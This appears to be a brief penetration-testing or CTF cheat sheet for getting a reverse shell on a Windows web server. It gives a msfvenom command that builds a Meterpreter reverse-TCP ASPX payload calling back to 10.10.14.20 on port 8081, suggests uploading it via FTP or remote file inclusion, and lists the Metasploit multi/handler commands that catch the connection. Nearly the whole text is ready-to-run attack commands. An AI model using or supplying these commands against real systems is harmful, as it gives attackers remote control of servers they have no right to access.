
# 1. This is to create a reverse shell via MSVENOM - Meterpreter. 

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.20 LPORT=8081 -f aspx > shell.aspx

!!! make sure you make the file executable 

chmod +x shell.aspx

# 2. Upload shell

Either via FTP or possibly some from of remote file inclusion or something

# 3. This is the multi-handler to accept the reverse shell. 

msf5 > use multi/handler

msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
exploit(multi/handler) > set LHOST 10.10.14.20
exploit(multi/handler) > set LPORT 8081
exploit



